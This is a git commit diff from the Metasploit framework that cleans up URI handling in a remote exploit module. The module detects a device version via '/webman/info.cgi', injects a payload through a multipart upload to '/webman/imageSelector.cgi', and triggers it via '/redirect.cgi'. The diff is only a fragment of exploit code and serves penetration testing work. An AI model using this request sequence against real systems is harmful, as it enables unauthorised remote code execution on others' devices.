Do send_request_cgi final clean up

bug/bundler_fix
jvazquez-r7 2013-12-20 17:00:57 -06:00
parent 13a4c62b0d
commit 163a54f8b1
1 changed files with 5 additions and 4 deletions

View File

@ -68,8 +68,9 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/webman/info.cgi?host=')
'method' => 'GET',
'uri' => normalize_uri('webman', 'info.cgi'),
'vars_get' => { 'host' => ''}
})
if res and res.code == 200 and res.body =~ DEVICE_INFO_PATTERN
@ -127,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Injecting the payload...")
res = send_request_cgi({
'method' => 'POST',
'uri' => '/webman/imageSelector.cgi',
'uri' => normalize_uri('webman', 'imageSelector.cgi'),
'ctype' => "multipart/form-data; boundary=#{mime_msg.bound}",
'headers' => {
'X-TYPE-NAME' => 'SLICEUPLOAD',
@ -144,7 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("#{peer} - Executing the payload...")
res = send_request_cgi({
'method' => 'GET',
'uri' => '/redirect.cgi'
'uri' => normalize_uri('redirect.cgi'),
})
# Read command output if cmd/unix/generic payload was used